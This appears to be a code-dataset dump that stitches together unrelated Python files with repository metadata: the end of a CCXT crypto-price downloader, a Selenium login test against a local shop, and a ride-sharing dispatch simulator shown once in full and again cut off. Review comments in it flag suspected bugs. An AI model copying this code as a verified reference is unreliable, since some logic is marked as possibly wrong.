        "--end_datetime",
        action="store",
        type=str,
        default=None,
        help="End date of download to parse with pd.Timestamp. "
        "None means datetime.now())",
    )
    parser.add_argument(
        "--step",
        action="store",
        type=int,
        default=None,
        help="Size of each API request per iteration",
    )
    parser.add_argument(
        "--sleep_time",
        action="store",
        type=int,
        default=60,
        help="Sleep time between currency pair downloads (in seconds).",
    )
    parser.add_argument("--incremental", action="store_true")
    parser = hparser.add_verbosity_arg(parser)
    return parser  # type: ignore[no-any-return]
def _main(parser: argparse.ArgumentParser) -> None:
    """Download OHLCV data for every (exchange, currency pair) in the universe.

    Creates the destination directory, resolves the requested date range
    and trading universe, then downloads each pair's OHLCV data via CCXT
    and saves it as a gzipped CSV in the destination directory.
    """
    args = parser.parse_args()
    hdbg.init_logger(verbosity=args.log_level, use_exec_path=True)
    # Create the directory.
    hio.create_dir(args.dst_dir, incremental=args.incremental)
    # Handle start and end datetime.
    start_datetime = pd.Timestamp(args.start_datetime)
    if not args.end_datetime:
        # If end datetime is not provided, use the current time.
        end_datetime = pd.Timestamp.now()
    else:
        end_datetime = pd.Timestamp(args.end_datetime)
    # Load trading universe.
    if args.universe == "latest":
        trade_universe = imvccunun.get_trade_universe()["CCXT"]
    else:
        trade_universe = imvccunun.get_trade_universe(args.universe)["CCXT"]
    _LOG.info("Getting data for exchanges %s", ", ".join(trade_universe.keys()))
    for exchange_id in trade_universe:
        # Initialize the exchange class.
        exchange = imvcdeexcl.CcxtExchange(
            exchange_id, api_keys_path=args.api_keys
        )
        for currency_pair in trade_universe[exchange_id]:
            _LOG.info("Downloading currency pair '%s'", currency_pair)
            # Download OHLCV data.
            currency_pair_data = exchange.download_ohlcv_data(
                currency_pair,
                start_datetime=start_datetime,
                end_datetime=end_datetime,
                bar_per_iteration=args.step,
            )
            # Sleep between iterations.
            time.sleep(args.sleep_time)
            # Create file name based on exchange and currency pair.
            # E.g. 'binance_BTC_USDT.csv.gz'
            # NOTE(review): the example above uses underscores, but the code
            # joins with '-' and uses the raw pair; a pair containing '/'
            # would end up in the filesystem path — confirm pairs are
            # pre-sanitized upstream.
            file_name = f"{exchange_id}-{currency_pair}.csv.gz"
            full_path = os.path.join(args.dst_dir, file_name)
            # Save file.
            currency_pair_data.to_csv(
                full_path,
                index=False,
                compression="gzip",
            )
            _LOG.debug("Saved data to %s", file_name)
if __name__ == "__main__":
_main(_parse())
| 3,588 | 0 | 46 |
7dc34db5f2dc00dd11e93a3fc1b4656f6a345054 | 509 | py | Python | hw4_ch.py | AeliaKavington/sel-1 | 1d1af349a567a50c14a7e3ece2fa44e119ddb777 | [
"MIT"
] | null | null | null | hw4_ch.py | AeliaKavington/sel-1 | 1d1af349a567a50c14a7e3ece2fa44e119ddb777 | [
"MIT"
] | null | null | null | hw4_ch.py | AeliaKavington/sel-1 | 1d1af349a567a50c14a7e3ece2fa44e119ddb777 | [
"MIT"
] | null | null | null | import pytest
from time import sleep
from selenium import webdriver
@pytest.fixture
| 28.277778 | 68 | 0.740668 | import pytest
from time import sleep
from selenium import webdriver
@pytest.fixture
def driver(request):
    """Pytest fixture: start a local Chrome WebDriver and quit it on teardown."""
    wd = webdriver.Chrome(executable_path='./chromedriver')
    print(wd.capabilities)
    # Ensure the browser is closed even if the test fails.
    request.addfinalizer(wd.quit)
    return wd
def test_example(driver):
    """Open the local litecart store and log in with test credentials."""
    driver.get("http://localhost/litecart/en/")
    driver.find_element_by_name("email").send_keys("user@email.com")
    driver.find_element_by_name("password").send_keys("test")
    driver.find_element_by_name("login").click()
    # Pause so the logged-in page is visible before the session is torn down.
    sleep(5)
590d8de8bf744cdfaa4d9f3f82d36a9864edf3bf | 25,183 | py | Python | python/handler.py | kgladstone/thesis | 6e35fbd7c2cd08e868ce5c36cd64e8025c9e5f53 | [
"BSD-3-Clause"
] | null | null | null | python/handler.py | kgladstone/thesis | 6e35fbd7c2cd08e868ce5c36cd64e8025c9e5f53 | [
"BSD-3-Clause"
] | null | null | null | python/handler.py | kgladstone/thesis | 6e35fbd7c2cd08e868ce5c36cd64e8025c9e5f53 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
"""
Filename: handler.py
Author: Keith Gladstone
Description:
This file is the heart of the program
It handles all vehicle allocation and repositioning
Contains trip_buffer, trip_location_hash_table, etc.
"""
import csv
import sys
from collections import deque
from math import floor
from vehicle import Vehicle
import trip_ops
import generic_ops
import pixel_ops
import demand_learning
def local_demand_predictor(current_p, day, time_block, beliefs, local_demand_degree):
    '''Determines optimal cardinal direction to move vehicle.

    Sums believed demand over the local superpixel separately for each of
    the four cardinal directions and returns the neighboring pixel (an
    (x, y) tuple) in the highest-demand direction.  Ties are broken in
    favor of the later direction in the order right, up, left, down.
    '''
    cur_x, cur_y = current_p
    # Candidate destinations, indexed as: 0=right, 1=up, 2=left, 3=down.
    neighbors = [(cur_x + 1, cur_y),
                 (cur_x, cur_y + 1),
                 (cur_x - 1, cur_y),
                 (cur_x, cur_y - 1)]
    demand_by_direction = [0, 0, 0, 0]
    local_pixels = pixel_ops.get_superpixel_degree_n(current_p, local_demand_degree)
    for city_pixel, pixel_demand in beliefs.iteritems():
        if city_pixel not in local_pixels:
            continue
        px, py = city_pixel
        demand_value = pixel_demand[generic_ops.get_day_code(day)][time_block][0]
        # A pixel may contribute to two directions at once (e.g. up-right).
        if px > cur_x:
            demand_by_direction[0] += demand_value
        if py > cur_y:
            demand_by_direction[1] += demand_value
        if px < cur_x:
            demand_by_direction[2] += demand_value
        if py < cur_y:
            demand_by_direction[3] += demand_value
    # '>=' mirrors the original max-over-(value, index) tie-breaking:
    # on equal demand, the later direction wins.
    best_index = 0
    for i, demand in enumerate(demand_by_direction):
        if demand >= demand_by_direction[best_index]:
            best_index = i
    return neighbors[best_index]
def handle_empty_repositioning(vehicles_log, time, beliefs, local_demand_degree):
    '''Moves vehicle using LEVRS (local empty-vehicle repositioning).

    Every vehicle whose last ping predates `time` is considered idle and
    is nudged one pixel toward the direction of highest believed local
    demand.  Returns the (updated) vehicles_log.
    '''
    time_block = generic_ops.get_time_block_from_time(time)
    day_of_week = generic_ops.get_day_of_week_from_time(time)
    # A vehicle is "empty" when it has been idle since before `time`.
    idle_vehicles = [vehicle for vehicle in vehicles_log.values()
                     if vehicle.time_of_last_ping < time]
    if not idle_vehicles:
        return vehicles_log
    for vehicle in idle_vehicles:
        destination = local_demand_predictor(
            vehicle.most_recently_pinged_location,
            day_of_week, time_block, beliefs, local_demand_degree)
        vehicles_log[vehicle.vehicle_id] = \
            vehicle.empty_reposition(time, destination)
    return vehicles_log
def initial_vehicle_log(trip_log, fleet_size):
    '''Create the initial vehicles_log.

    Seeds the fleet by assigning the first `fleet_size` trips of the trip
    log to one fresh vehicle each; every vehicle starts positioned at its
    seed trip's dropoff pixel and time.  Returns a dict mapping
    vehicle_id -> Vehicle.
    '''
    seed_trips = generic_ops.list_from_dict(trip_log)[:fleet_size]
    vehicles_log = dict()
    for vehicle_id, (trip_id, trip) in enumerate(seed_trips):
        person_miles = trip_ops.get_person_miles_of_joined_trip(trip_log, trip_id)
        vehicle_miles = trip_ops.get_vehicle_miles_of_joined_trip(trip_log, trip_id)
        vehicles_log[vehicle_id] = Vehicle(
            vehicle_id,
            [trip.trip_id],
            0,
            trip.dropoff_pixel,
            trip.dropoff_time,
            person_miles,
            vehicle_miles)
    return vehicles_log
def find_best_common_origin_seq(trip_list, max_circuity, max_stops):
    '''Given a list of trips, find the best rideshared route.

    Uses a Hamiltonian-path heuristic over the trips' pixels, then
    validates the resulting stop sequence against two rider constraints:
      * no more than `max_stops` distinct dropoff pixels, and
      * at each dropoff, the distance actually traveled along the route
        must not exceed `max_circuity` times the direct Manhattan
        distance from the common origin.
    Returns the stop sequence after the origin, or None if any
    constraint is violated.
    '''
    path = pixel_ops.hamilton_of_trip_list(trip_list)[1]
    distinct_stops = dict()
    origin_pixel = path[0][0]
    prev_destination = origin_pixel
    circuity_distance = 0
    # Check if every trip in path meets the max circuity constraint and max stops constraint
    # If constraints are met then this should NOT return None
    for pair in path[1:]:
        destination_pixel = pair[0]
        # Dict used as an ordered set of distinct dropoff pixels.
        distinct_stops[destination_pixel] = True
        if len(distinct_stops) > max_stops:
            return None
        direct_manhattan_distance = pixel_ops.manhattan_distance(origin_pixel, destination_pixel)
        # Accumulate the distance traveled along the shared route so far.
        circuity_distance += pixel_ops.manhattan_distance(prev_destination, destination_pixel)
        prev_destination = destination_pixel
        if direct_manhattan_distance != 0:
            # Skip the ratio check when a dropoff sits on the origin pixel
            # (avoids division by zero).
            ratio = 1.0 * circuity_distance / direct_manhattan_distance
            if ratio > max_circuity:
                return None
    return path[1:]
def predispatched_trips(trip_log, trip_location_hash_table, pickup_pixel):
    '''Get the predispatched trips from a certain pickup_pixel.

    Looks up the most recent entry hashed at pickup_pixel and returns
    every trip already joined with it.
    '''
    entries = list(trip_location_hash_table[pickup_pixel])
    latest_trip = entries[-1][1]
    return trip_ops.get_all_joined_trips(trip_log, latest_trip.trip_id)
def optimal_route(trip, trip_log, trip_location_hash_table,
                  pickup_pixel, constraints):
    '''Get the optimal route of rideshared trips.

    Appends `trip` to the pool of trips already dispatched from
    pickup_pixel and returns the best constraint-satisfying stop order
    (None if the combined pool violates the circuity or stop-count
    constraints).
    '''
    candidate_trips = predispatched_trips(
        trip_log, trip_location_hash_table, pickup_pixel)
    candidate_trips.append(trip)
    return find_best_common_origin_seq(candidate_trips,
                                       constraints['max_circuity'],
                                       constraints['max_stops'])
def sync_joined_trips(trip_log, trip_id, dispatch_time):
    '''Sync the data for rideshared trips.

    Starting from the head trip of a rideshare chain, stamps the head's
    actual pickup/dropoff times, then walks the chain of joined trips,
    accumulating travel time leg by leg and propagating the head trip's
    vehicle assignment.  Returns the trip_log.
    '''
    trip = trip_ops.get_trip(trip_log, trip_id)
    vehicle_id = trip.vehicle_id
    joined_trip_id = trip.joined_trip_id
    pickup_location = trip.pickup_pixel
    trip.pickup_time = dispatch_time
    time_elapsed = pixel_ops.time_of_travel(pickup_location, trip.dropoff_pixel)
    trip.dropoff_time = dispatch_time + time_elapsed
    # For each subsequent trip, update the time elapsed to reach destination
    # Update the vehicle id
    while True:
        joined_trip = trip_ops.get_trip(trip_log, joined_trip_id)
        # NOTE(review): every leg below is measured from the HEAD trip's
        # dropoff_pixel rather than the previous stop's — confirm this is
        # intended and not a bug.
        time_elapsed += pixel_ops.time_of_travel(trip.dropoff_pixel, joined_trip.dropoff_pixel)
        # NOTE(review): the returned objects are rebound locally; this only
        # updates trip_log if set_actual_t/set_vehicle mutate in place —
        # verify against the Trip implementation.
        joined_trip = joined_trip.set_actual_t(dispatch_time, dispatch_time + time_elapsed)
        joined_trip = joined_trip.set_vehicle(vehicle_id)
        trip_id = joined_trip_id
        joined_trip_id = joined_trip.joined_trip_id
        # A trip whose joined_trip_id points at itself terminates the chain.
        if joined_trip_id == trip_id:
            break
    return trip_log
def send_vehicle_for_this_request(trip_log, trip_id, vehicle_info, vehicles_log, constraints):
    '''Assign vehicle to trip request.

    vehicle_info is the dict produced by vehicle_min_arrival_time (keys
    "vehicle_id" and "time_delay").  Updates the trip (vehicle id, time
    delay) and the vehicle's schedule in place, then returns the updated
    (trip_log, vehicles_log) pair.
    '''
    departure_delay = constraints['departure_delay']
    assert(vehicle_info is not None), "Vehicle Info is None"
    vehicle_id = vehicle_info['vehicle_id']
    time_delay = vehicle_info['time_delay']
    # Update vehicle ID
    trip = trip_ops.get_trip(trip_log, trip_id)
    trip.vehicle_id = vehicle_id
    # Update trip's time delay: at least the mandatory departure delay,
    # more if the vehicle needs longer to reach the pickup pixel.
    trip = trip.increase_time_delay(max(time_delay, departure_delay))
    # Update trip log
    trip_log[trip_id] = trip
    # Update vehicle log accordingly
    vehicles_log[vehicle_id].add_trip_to_schedule(trip) # this causes absurd scale
    return trip_log, vehicles_log
def get_vehicles_latest_trips(vehicles_log):
    '''Get the latest scheduled location and time of all vehicles.

    Returns a dict mapping vehicle_id -> (most recently pinged location,
    time of last ping) for every vehicle in the log.
    '''
    return dict(
        (vehicle.vehicle_id,
         (vehicle.most_recently_pinged_location, vehicle.time_of_last_ping))
        for vehicle in vehicles_log.values())
def vehicle_min_arrival_time(trip_log, trip_id, vehicles_log):
    '''Get the vehicle that will arrive soonest for trip_id.

    Returns a dict with keys "vehicle_id", "pre_repositioned_location"
    and "time_delay" (time between the pickup request and the soonest
    possible arrival).  Raises AssertionError if no vehicle can be
    selected (empty vehicles_log).
    '''
    vehicles_latest_trips = get_vehicles_latest_trips(vehicles_log)
    trip = trip_ops.get_trip(trip_log, trip_id)
    request_time = trip.pickup_request_time
    # Get the vehicle that can arrive soonest (with travel estimate)
    closest_vehicle_info = None
    # None acts as the +infinity sentinel (portable, unlike sys.maxint).
    min_time = None
    for vehicle_id, (pre_repositioned_location, pre_repositioned_time) \
            in vehicles_latest_trips.items():
        travel_time = pixel_ops.time_of_travel(pre_repositioned_location, trip.pickup_pixel)
        # Vehicle is already there, use it.
        # BUG FIX: this fast path used to return a bare tuple, but the
        # caller (send_vehicle_for_this_request) indexes the result as a
        # dict ("vehicle_id"/"time_delay") -- return the same dict shape.
        if travel_time == 0.0:
            return {"vehicle_id" : vehicle_id,
                    "pre_repositioned_location" : pre_repositioned_location,
                    "time_delay" : 0.0}
        # Vehicle departs once it is both free and the request has arrived.
        time_vehicle_would_arrive = \
            max(pre_repositioned_time, request_time) + travel_time
        if min_time is None or time_vehicle_would_arrive < min_time:
            min_time = time_vehicle_would_arrive
            time_delay = time_vehicle_would_arrive - request_time
            assert(time_delay >= 0), \
                """
                Time Delay is negative: %s
                Trip: %s
                Pre Repositioned Time: %s
                Pre Repositioned Location: %s
                Request Time: %s
                Travel Time: %s
                Time Vehicle Would Arrive Here: %s
                """ % (str(time_delay),
                       str(trip.__dict__),
                       str(pre_repositioned_time),
                       str(pre_repositioned_location),
                       str(request_time),
                       str(travel_time),
                       str(time_vehicle_would_arrive))
            closest_vehicle_info = {"vehicle_id" : vehicle_id,
                                    "pre_repositioned_location" : pre_repositioned_location,
                                    "time_delay" : time_delay}
    assert(closest_vehicle_info is not None), "Closest Vehicle not selected"
    return closest_vehicle_info
def get_vehicle_for_this_trip(trip_log, trip_id, vehicles_log):
    '''Get the vehicle to be assigned for this trip.

    Thin wrapper that delegates to vehicle_min_arrival_time, which picks
    the vehicle with the earliest possible arrival at the pickup pixel.
    '''
    return vehicle_min_arrival_time(trip_log, trip_id, vehicles_log)
def do_request_new_vehicle(trip_log, trip_id, vehicles_log,
                           constraints, trip_buffer, trip_location_hash_table):
    '''Request a new vehicle for this trip, handle info.

    Picks the vehicle that can arrive soonest, links it to the trip, and
    enqueues the trip for future dispatch, both in the time-ordered
    trip_buffer and in the per-origin trip_location_hash_table.
    '''
    # Helper variables
    trip = trip_ops.get_trip(trip_log, trip_id)
    pickup_pixel, dropoff_pixel = (trip.pickup_pixel, trip.dropoff_pixel)
    # Need to a request a new vehicle for this trip
    # (1) Identify which vehicle is needed
    # (2) Update data structures to link this trip request to that vehicle and "send vehicle"
    vehicle_for_this_trip = get_vehicle_for_this_trip(trip_log, trip_id, vehicles_log)
    trip_log, vehicles_log = send_vehicle_for_this_request(trip_log, trip_id,
                                                           vehicle_for_this_trip,
                                                           vehicles_log, constraints)
    # We want to put this trip, therefore, in the trip fulfillment queue and location dict
    # NOTE(review): the rebinding of trip_buffer below is local and is not
    # returned to the caller -- this only works if deque_put_in_place
    # mutates and returns the same deque; verify in generic_ops.
    trip_buffer = generic_ops.deque_put_in_place(trip_buffer, (trip, trip.pickup_time))
    trip_location_hash_table[pickup_pixel].append((dropoff_pixel, trip))
    return trip_log, vehicles_log
def is_this_vehicles_latest_loc(trip_log, vehicles_log,
                                trip_location_hash_table, pickup_pixel):
    '''Is the vehicle's latest scheduled trip the latest trip scheduled at this pickup pixel?

    Used by the greedy common-origin scheduler: a request may only be
    merged into an existing route if its vehicle has not been scheduled
    onto some other trip since.
    '''
    if len(trip_location_hash_table[pickup_pixel]) == 0:
        return False
    # Most recent (dropoff_pixel, trip) pair queued at this origin.
    the_trip_scheduled_from_this_origin = trip_location_hash_table[pickup_pixel][-1]
    trip = the_trip_scheduled_from_this_origin[1]
    # Walk the joined-trip chain to its last leg to find the vehicle.
    last_common_origin_trip = trip_ops.get_last_joined_trip(trip_log, trip.trip_id)
    vehicle_id = last_common_origin_trip.vehicle_id
    the_latest_trip_scheduled_with_this_vehicle = vehicles_log[vehicle_id].latest_trip
    # str() on both sides -- presumably trip ids may be stored as int in
    # one structure and str in the other; verify against Vehicle.
    return str(the_latest_trip_scheduled_with_this_vehicle) == str(trip.trip_id)
def get_joined_trip_occupants(trip_legs):
    '''Get the number of total occupants for all trip legs of a rideshared trip'''
    return sum(trip_leg.occupancy for trip_leg in trip_legs)
def common_origin_validation(trip_location_hash_table, trip_log,
                             vehicles_log, new_trip_request, constraints):
    '''Run the common origin validation process.

    Decides whether new_trip_request can be merged into an existing
    undispatched route departing from the same pickup pixel.  Returns
    (request_new_vehicle, optimal_order): optimal_order is the feasible
    rideshare sequence when merging works, otherwise None and a fresh
    vehicle must be requested.
    '''
    vehicle_size = constraints['vehicle_size']
    request_new_vehicle = True
    optimal_order = None
    pickup_pixel = new_trip_request.pickup_pixel
    there_exists_undispatched_vehicle_from_this_origin = \
        len(trip_location_hash_table[pickup_pixel]) > 0
    # If there exists a vehicle from this origin
    if there_exists_undispatched_vehicle_from_this_origin:
        # This is the Greedy Common Origin Trip Sender
        # If the vehicle's latest undispatched trip is not from this origin,
        # then request a new vehicle
        if not is_this_vehicles_latest_loc(trip_log,
                                           vehicles_log,
                                           trip_location_hash_table,
                                           pickup_pixel):
            request_new_vehicle = True  # already the default; kept for clarity
        else:
            # Get pickup time of the trip
            first_leg_of_trip_here = list(trip_location_hash_table[pickup_pixel])[0][1]
            # Too late to join: the shared vehicle would already have left.
            if new_trip_request.pickup_request_time > first_leg_of_trip_here.pickup_time:
                request_new_vehicle = True
            else:
                # SUBJECT TO vehicle_size CONSTRAINT
                current_joined_trip = [that_trip[1] \
                                       for that_trip \
                                       in list(trip_location_hash_table[pickup_pixel])]
                current_vehicle_occupancy = get_joined_trip_occupants(current_joined_trip)
                vehicle_would_exceed_capacity = \
                    current_vehicle_occupancy + new_trip_request.occupancy > vehicle_size
                if vehicle_would_exceed_capacity:
                    request_new_vehicle = True
                else:
                    # SUBJECT TO MAX CIRCUITY AND MAX STOPS CONSTRAINTS
                    optimal_order = optimal_route(new_trip_request,
                                                  trip_log,
                                                  trip_location_hash_table,
                                                  pickup_pixel,
                                                  constraints)
                    # Merge succeeds only if a feasible sequence exists.
                    request_new_vehicle = optimal_order is None
    return request_new_vehicle, optimal_order
def resequence_joined_trip_ids(trip_log, ordered_joined_trips):
    '''Resync joined trip ids.

    Re-links each leg of a rideshared route to the next one; the final
    leg points at itself, marking the end of the chain.  The trip objects
    are mutated in place, so trip_log is returned unchanged.
    '''
    for current_leg, next_leg in zip(ordered_joined_trips,
                                     ordered_joined_trips[1:]):
        current_leg.joined_trip_id = next_leg.trip_id
    final_leg = ordered_joined_trips[-1]
    final_leg.joined_trip_id = final_leg.trip_id
    return trip_log
def greedy_common_origin_scheduler(trip_log, vehicles_log, trip_location_hash_table,
                                   trip_buffer, new_trip_request, optimal_order):
    '''Run Greedy Common Origin Strategy heuristic.

    Merges new_trip_request into the route already scheduled from its
    pickup pixel: re-chains the legs in the optimal order, re-stamps
    pickup/dropoff times, and swaps the route's first leg in the vehicle
    schedule, the dispatch buffer and the per-origin queue.
    '''
    pickup_pixel = new_trip_request.pickup_pixel
    # optimal_order holds (pixel, trip) pairs; extract the trips in order.
    optimal_order_CO_destinations = [trip[1] for trip in optimal_order]
    new_first_trip_of_route = optimal_order_CO_destinations[0]
    scheduled_trip_from_this_origin = list(trip_location_hash_table[pickup_pixel])[-1][1]
    pickup_time = scheduled_trip_from_this_origin.pickup_time
    vehicle_id = scheduled_trip_from_this_origin.vehicle_id
    trip_log = resequence_joined_trip_ids(trip_log, optimal_order_CO_destinations)
    vehicles_log[vehicle_id] = \
        vehicles_log[vehicle_id].replace_last_trip(new_first_trip_of_route)
    # NOTE(review): set_vehicle's return value is discarded here although
    # other call sites rebind it (see sync_joined_trips) -- confirm it
    # mutates in place, otherwise the vehicle id assignment is lost.
    new_trip_request.set_vehicle(vehicle_id)
    sync_joined_trips(trip_log, new_first_trip_of_route.trip_id, pickup_time)
    generic_ops.deque_replace(trip_buffer,
                              (scheduled_trip_from_this_origin, pickup_time),
                              (new_first_trip_of_route, pickup_time))
    trip_location_hash_table[pickup_pixel].popleft()
    trip_location_hash_table[pickup_pixel].append((optimal_order[0][0], new_first_trip_of_route))
    return trip_log, vehicles_log, trip_location_hash_table
def process_request(trip_log, trip, vehicles_log,
                    constraints, trip_location_hash_table, trip_buffer):
    '''Run the general process for a single trip request.

    Decides between dispatching a fresh vehicle and merging the request
    into an existing common-origin route (greedy heuristic), then updates
    all scheduling structures accordingly.
    '''
    greedy = constraints['greedy_common_origin']
    request_new_vehicle = True # default true, but turn false if vehicle is available
    # Helper variables
    new_trip_request = trip
    pickup_pixel = new_trip_request.pickup_pixel
    # If the origin point has NOT been accounted for yet then set it up as
    # an empty deque of destination points
    if pickup_pixel not in trip_location_hash_table.keys():
        trip_location_hash_table[pickup_pixel] = deque()
    # Determine whether to request new vehicle or not
    request_new_vehicle, optimal_order = common_origin_validation(\
        trip_location_hash_table, trip_log, vehicles_log, new_trip_request, constraints)
    # HACK: to make sure that pickup_request time is not after pickup time
    if optimal_order is not None:
        pickup_pixel = new_trip_request.pickup_pixel
        new_first_trip_of_route = optimal_order[0][1]
        scheduled_trip_from_this_origin = list(trip_location_hash_table[pickup_pixel])[-1][1]
        pickup_time = scheduled_trip_from_this_origin.pickup_time
        if new_first_trip_of_route.pickup_request_time > pickup_time:
            request_new_vehicle = True
    # Request a vehicle from the fleet
    if request_new_vehicle:
        trip_log, vehicles_log = \
            do_request_new_vehicle(trip_log,
                                   trip.trip_id,
                                   vehicles_log,
                                   constraints,
                                   trip_buffer,
                                   trip_location_hash_table)
    # Enter RIDESHARE process
    # Greedy Heuristic
    else:
        if greedy:
            trip_log, vehicles_log, trip_location_hash_table = \
                greedy_common_origin_scheduler(trip_log,
                                               vehicles_log,
                                               trip_location_hash_table,
                                               trip_buffer,
                                               new_trip_request,
                                               optimal_order)
    return trip_log, vehicles_log
def handle_requests_at_this_time(trip_log, vehicles_log,
                                 requests, constraints,
                                 trip_location_hash_table, trip_buffer, beliefs):
    '''Run the processes for all requests in this batch.

    Registers each request in trip_log, schedules it (new vehicle or
    rideshare) and, when LEVRS is enabled (freq_levrs != 0), folds the
    observation into the demand belief model.
    '''
    list_of_trip_requests_now = requests
    for trip in list_of_trip_requests_now:
        trip_log[trip.trip_id] = trip
        trip_log, vehicles_log = process_request(trip_log,
                                                 trip,
                                                 vehicles_log,
                                                 constraints,
                                                 trip_location_hash_table,
                                                 trip_buffer)
        if int(constraints['freq_levrs']) != 0:
            betas = {'initial' : constraints['initial_beta'], 'obs' : constraints['beta_obs']}
            beliefs = demand_learning.update_belief_model(trip, beliefs, betas)
    return trip_log, vehicles_log, beliefs
def clear_trips_for_dispatch(trip_log, dispatch_time, vehicles_log,
                             trip_location_hash_table,
                             trip_buffer, dict_writer):
    '''Send dispatched files to output, remove from data structures.

    Pops every trip whose pickup time has been reached off the front of
    trip_buffer, writes all of its joined legs to the CSV output, credits
    the assigned vehicle with the person/vehicle miles, and removes the
    legs from trip_log.  All structures are mutated in place and nothing
    is returned.  (FIX: the old version returned a tuple from one branch
    and None from the other; the redundant early-exit branch -- already
    covered by the while condition -- was removed and the function now
    consistently returns None.)
    '''
    while len(trip_buffer) > 0:
        next_to_dispatch_trip, next_to_dispatch_pickup_time = trip_buffer[0]
        # Stop as soon as the head of the queue is not yet due; the buffer
        # is kept ordered by pickup time, so nothing behind it is due either.
        if floor(next_to_dispatch_pickup_time) > floor(dispatch_time):
            break
        pickup_pixel = next_to_dispatch_trip.pickup_pixel
        vehicle_id = next_to_dispatch_trip.vehicle_id
        # Credit the vehicle with the mileage of the whole joined trip.
        vehicles_log[vehicle_id].cumulative_person_miles += \
            trip_ops.get_person_miles_of_joined_trip(trip_log, next_to_dispatch_trip.trip_id)
        vehicles_log[vehicle_id].cumulative_vehicle_miles += \
            trip_ops.get_vehicle_miles_of_joined_trip(trip_log, next_to_dispatch_trip.trip_id)
        all_joined_trips = trip_ops.get_all_joined_trips(trip_log,
                                                         next_to_dispatch_trip.trip_id)
        for that_trip in all_joined_trips:
            assert(that_trip.valid()), "Trip being written is invalid" # this needs to be true
            dict_writer.writerow(that_trip.__dict__)
            del trip_log[that_trip.trip_id]
        trip_buffer.popleft()
        trip_location_hash_table[pickup_pixel].popleft()
    return
def receive_requests_now(reader, time, rollover_request):
    '''Listen for requests at this time from the stream.

    Accumulates trips from the reader whose pickup_request_time is <=
    time.  The first trip requested after `time` becomes the new rollover
    request, re-offered on the next tick.  Returns (requests_now,
    rollover); requests_now is None once the stream is fully drained.

    BUG FIX: previously, when the stream ended mid-batch, the trips
    already collected (including a pending rollover_request) were
    silently dropped.  They are now returned for processing; the
    exhausted stream then reports (None, None) on the following call.
    '''
    if rollover_request is None:
        requests_now = list()
    else:
        requests_now = [rollover_request]
    while True:
        try:
            next_line = reader.next()
        except StopIteration:
            # Stream exhausted: flush whatever was collected this tick.
            if requests_now:
                return requests_now, None
            return None, None
        trip = trip_ops.process_cleaned_trip(next_line)
        if trip.pickup_request_time > time:
            return requests_now, trip
        requests_now.append(trip)
def handle_all_trip_requests(constraints):
    '''Main function: stream trip requests, dispatch vehicles, write results.

    Seeds the fleet from the first fleet_size trips, then advances a
    simulated clock one tick at a time: receive requests, schedule them
    (possibly ridesharing), dispatch due trips to the output CSV, and
    optionally reposition empty vehicles (LEVRS).  Returns vehicles_log.
    '''
    fleet_size = constraints['fleet_size']
    beliefs = constraints['beliefs']
    local_demand_degree = constraints['local_demand_degree']
    freq_levrs = int(constraints['freq_levrs'])
    cleaned_filepath = generic_ops.cleaned_fp(constraints['raw'])
    result_filepath = generic_ops.results_fp(constraints['raw'], constraints['index'])
    #-------------------------------------------------------- START READER OPS
    inputfile = open(cleaned_filepath, 'rb')
    reader = csv.DictReader(inputfile)
    initial_trip_log = trip_ops.read_n_cleaned_trips(reader, fleet_size)
    #-------------------------------------------------------- END READER OPS
    #-------------------------------------------------------- START WRITER OPS
    open(result_filepath, 'w').close() # reset the output file
    # FIX: mode was the non-standard string 'wa' (behaved as 'w'); use a
    # valid mode explicitly.
    outputfile = open(result_filepath, 'w')
    keys = initial_trip_log.values()[0].__dict__.keys()
    dict_writer = csv.DictWriter(outputfile, keys)
    dict_writer.writeheader()
    for trip in initial_trip_log.values():
        dict_writer.writerow(trip.__dict__)
    #-------------------------------------------------------- END WRITER OPS
    # trip_location_hash_table is a data structure that is a dict of trip origin points,
    # each origin point contains a deque of trips scheduled to leave from that point,
    # represented solely by the trip that is the first-stop of that trip.
    # trip_buffer is a double-ended-queue data structure that enqueues requests
    # as they come in and dequeues them when they are dispatched.
    # trip_log is a dict that is synced with the trip_buffer,
    # contains more detailed info about trips.
    trip_location_hash_table = dict()
    trip_buffer = deque()
    # Transform Trip Log to Be Indexed By Vehicle ID
    vehicles_log = initial_vehicle_log(initial_trip_log, fleet_size)
    # Get time of last initial pickup request.
    # NOTE(review): values()[-1] assumes read_n_cleaned_trips returns an
    # order-preserving mapping (e.g. OrderedDict) -- verify, since a plain
    # Python 2 dict has arbitrary ordering.
    start_time = initial_trip_log.values()[-1].pickup_request_time
    # Clear this variable to save memory
    initial_trip_log = None
    trip_log = dict()
    time = start_time
    rollover_request = None
    while True:
        requests, rollover_request = receive_requests_now(reader, time, rollover_request)
        # There are no incoming trip requests or trips left to dispatch. End Loop
        if requests is None and len(trip_buffer) == 0:
            break
        # There are trip requests this turn. Process them.
        # (FIX: the old guard also tested `len(requests) >= 0`, which is
        # always true; a dead counter loop over the hash table was removed.)
        if requests is not None:
            trip_log, vehicles_log, beliefs = \
                handle_requests_at_this_time(trip_log,
                                             vehicles_log,
                                             requests,
                                             constraints,
                                             trip_location_hash_table,
                                             trip_buffer,
                                             beliefs)
        # Clear trips ready for dispatch at this time.
        # BUG FIX: the arguments were previously passed as
        # (trip_log, vehicles_log, constraints, ...), shifting vehicles_log
        # into the dispatch_time parameter and constraints into
        # vehicles_log.  Pass the current clock tick and the logs in the
        # order the signature declares.
        clear_trips_for_dispatch(trip_log,
                                 time,
                                 vehicles_log,
                                 trip_location_hash_table,
                                 trip_buffer,
                                 dict_writer)
        # LEVRS Handling
        if freq_levrs != 0 and time % freq_levrs == 0:
            vehicles_log = \
                handle_empty_repositioning(vehicles_log, time, beliefs, local_demand_degree)
        time += 1 # next iteration of time
    outputfile.close()
    inputfile.close()  # FIX: the input stream was previously never closed
    assert(len(trip_log) == 0), "There were %s undispatched trips." % (str(len(trip_log)))
    return vehicles_log
| 43.796522 | 98 | 0.64611 | #!/usr/bin/env python
"""
Filename: handler.py
Author: Keith Gladstone
Description:
This file is the heart of the program
It handles all vehicle allocation and repositioning
Contains trip_buffer, trip_location_hash_table, etc.
"""
import csv
import sys
from collections import deque
from math import floor
from vehicle import Vehicle
import trip_ops
import generic_ops
import pixel_ops
import demand_learning
def local_demand_predictor(current_p, day, time_block, beliefs, local_demand_degree):
    '''Determines optimal cardinal direction to move vehicle.

    Sums believed demand across the surrounding superpixel into four
    directional buckets relative to current_p and returns the adjacent
    pixel (right/up/left/down) in the direction of highest demand.
    '''
    current_x, current_y = current_p
    directional_demand = [0, 0, 0, 0] # right, up, left, down
